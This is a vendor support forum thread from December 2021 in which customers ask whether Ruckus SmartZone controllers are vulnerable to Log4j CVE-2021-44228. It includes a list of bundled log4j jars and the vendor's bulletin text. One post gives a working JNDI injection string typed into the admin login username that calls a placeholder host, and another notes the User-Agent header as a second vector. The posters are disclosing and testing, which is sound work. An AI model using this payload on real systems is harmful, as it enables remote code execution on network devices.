topic Re: [CVE-2021-44228] Apache Log4j2 RCE in SmartZone and Virtual SmartZone

[CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee — Mon, 13 Dec 2021 01:51:16 GMT

Hello.

Our customer is running a Ruckus SmartZone (sz-100) controller.
The version of the controller is 5.1.1.0.598.

The customer asked if the SmartZone has the following this security vulnerabilities.

** Vulnerability: [CVE-2021-44228] Apache Log4j2 RCE

Thank you for your valuable answers to the above questions.

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Mon, 13 Dec 2021 03:30:16 GMT

Hello @dawoon_lee

This vulnerability is really new and our Engineering has been notified about this issue to check if this vulnerability is affecting us and how we can mitigate the effects. We do understood this is a critical situation and we will update you with the information from our internal team. Below is our link where we will soon add our response.

https://support.ruckuswireless.com/security

Best Regards

Vineet

Re: [CVE-2021-44228] Apache Log4j2 RCE

diego_garcia_de — Mon, 13 Dec 2021 04:40:23 GMT

Hi Vineet. I have an open case 01288986 asking engineering about the same question

Ai can't believe I was the first on to open such case, but they way the ticket is being dealt with seems as if there is no coordinated effort. We're past 72 hours after the initial discovery and I would have expected at an absolute minimum an announcement on the website or mailing list.

Also, at least a basic set of responses such as product x is using /not using log4j version y with jdk / jre version Z. At an absolute minimum, some basic communication.

My very first tests dont seem to indicate that the system is exploitable... (Referring to SZ 5.2.1) but these were basic fuzzing tests.

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Mon, 13 Dec 2021 05:19:25 GMT

@diego_garcia_del_rio

We are sorry for the delay but I see the TSE assisting you has also raised same concern with engineering and awaiting their response. I would update asap once we have a response from our engineering.

Best Regards

Vineet

Re: [CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee — Mon, 13 Dec 2021 08:08:51 GMT

@vineet_nejawala

I look forward to your sincere reply.
Thank you.

Re: [CVE-2021-44228] Apache Log4j2 RCE

torge_szczepane — Mon, 13 Dec 2021 08:26:54 GMT

I tested this myself on the weekend. Our virtual smartzone is affected.

Logging in to the Admin page by using a username:

${jndi:ldap://a.b.c.d:6666/a}

(replace a.b.c.d with a ip which is reachable by the controller)

will send out a request to this ip in a request for possible malware. I have shutdown my controller on the weekend.

Re: [CVE-2021-44228] Apache Log4j2 RCE

torge_szczepane — Mon, 13 Dec 2021 08:43:59 GMT

Filesystem content of VSZ Image:

./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.13.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.6.6.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.17.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-slf4j-impl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-jcl-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-web-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-to-slf4j-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.8.2.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-core-2.11.1.jar
./opt/ruckuswireless/wsg/apps/lib/slf4j-log4j12-1.7.5.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-over-slf4j-1.7.25.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-1.2.16.jar
./opt/ruckuswireless/wsg/apps/lib/log4j-api-2.8.2.jar

...

Re: [CVE-2021-44228] Apache Log4j2 RCE

dawoon_lee — Mon, 13 Dec 2021 08:59:39 GMT

@torge_szczepanek

Does the above also affect smartzone? (not virtual)

Re: [CVE-2021-44228] Apache Log4j2 RCE

torge_szczepane — Mon, 13 Dec 2021 09:29:52 GMT

My guess would be, that this is the same software just as a appliance. But this is just a guess. We do not have Smartzone devices.

Re: [CVE-2021-44228] Apache Log4j2 RCE

mark_pledl — Mon, 13 Dec 2021 12:23:29 GMT

@torge_szczepanek - good spot!

Br,

Mark.

Re: [CVE-2021-44228] Apache Log4j2 RCE

tom_lebel — Mon, 13 Dec 2021 13:48:59 GMT

Has Ruckus put out a public statement on this? I can't seem to find anything on their website for it. Can/Should we be shutting down our virtual VSze servers to protect systems?

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Mon, 13 Dec 2021 13:52:22 GMT

Hi @tom_lebel

We are expecting a response soon on this. Commscope is aware of the latest Vulnerability CVE-2021-44228. Our engineering team is currently performing the appropriate assessment on all our product lines . This is the highest priority for us and we will update our security bulletin as soon as more information is available on the same. Here is the link to our security bulletin which will be updated soon: https://support.ruckuswireless.com/security

Best Regards

Vineet

Re: [CVE-2021-44228] Apache Log4j2 RCE

mark_pledl — Mon, 13 Dec 2021 13:59:06 GMT

@tom_lebel - there is no public statement. I am no Ruckus employee.

Can you please make a ticket to Ruckus - they will update you with information. I don't want to hand out any details without their permission.

Hope you understand!

Br,

Mark.

Re: [CVE-2021-44228] Apache Log4j2 RCE

diego_garcia_de — Mon, 13 Dec 2021 14:10:38 GMT

@torge_szczepanek Thanks.. indeed those are alll the vulnerable packages.

I need to do one more test with a "hosting" server to see if the ldap response actually gets executed (I've been looking at this issue in details for other products and, depending on the java JRE security configuration, it migth refuse to download and execute code).

Another thing I've notices is that, at least for the username, it seems to truncate it but the user-agent header can also be used as an exploit it would seems

I still need to check if any downloaded code is actually executed.

Re: [CVE-2021-44228] Apache Log4j2 RCE

JTakaMT — Mon, 13 Dec 2021 16:15:34 GMT

Thanks for responding Vineet. We are looking forward to a Security Bulletin/Announcement update from the Ruckus team soon.

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Mon, 13 Dec 2021 16:32:18 GMT

@michael_thompson_e3bsvnhy1spi9

Thank you. The bulletin would be updated soon, so far we have been confirmed that code 3.6.2 is safe from this vulnerability and further is being tested.

Best Regards

Vineet

Re: [CVE-2021-44228] Apache Log4j2 RCE

grodog-prod — Mon, 13 Dec 2021 23:27:28 GMT

The RUCKUS Security Bulletin addressing Log4j is now published at https://support.ruckuswireless.com/security_bulletins/313

Allan.

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Tue, 14 Dec 2021 01:47:33 GMT

@dawoon_lee

@michael_thompson_e3bsvnhy1spi9

@diego_garcia_del_rio

@tom_lebel

Please find our official response and next action:

https://support.ruckuswireless.com/security_bulletins/313

Best Regards

Vineet

Re: [CVE-2021-44228] Apache Log4j2 RCE

diego_garcia_de — Tue, 14 Dec 2021 02:03:40 GMT

@allan_grohe hi Allan

The advisory seems to be only available in text format (and not pdf) and ALL text advisories return an error and do not load. Other vulns have a pdf version and we can access that but the text version just errors out

Also, given the criticality of the incident it would be good for the advisory to be available without a support account.

Re: [CVE-2021-44228] Apache Log4j2 RCE

Vineet_nejwala — Tue, 14 Dec 2021 02:17:16 GMT

@diego_garcia_del_rio

The text format is working well and we are working on pdf part too, meanwhile please find below content from our official response :

What is the issue?
A vulnerability was found in the Apache Log4j logging library from version 2.0 to 2.14.1. Products utilizing this library are susceptible to remote code execution vulnerability, where a remote attacker can leverage this vulnerability to gain full control of the impacted device.
For more details about this vulnerability, please see https://nvd.nist.gov/vuln/detail/CVE-2021-44228.

What action should I take?
RUCKUS is releasing the fix for these vulnerability through a software update. Since it is a critical issue, all affected customers are strongly encouraged to apply the fix once available.

In case of any questions contact RUCKUS TAC through regular means as described at https://support.ruckuswireless.com/contact-us and refer to this document to validate this entitlement.

Are there any workarounds available?
No

What is the impact on Ruckus products?

The following products are not vulnerable: All Access Points, ZoneDirector, Unleashed, ICX Switches, SPoT/vSPoT, and RUCKUS Cloud.

The following products are under assessment: Cloudpath, IoT, MobileApps, RUCKUS Analytics, and SCI.

The following table describes the vulnerable products, software versions, and the recommended actions.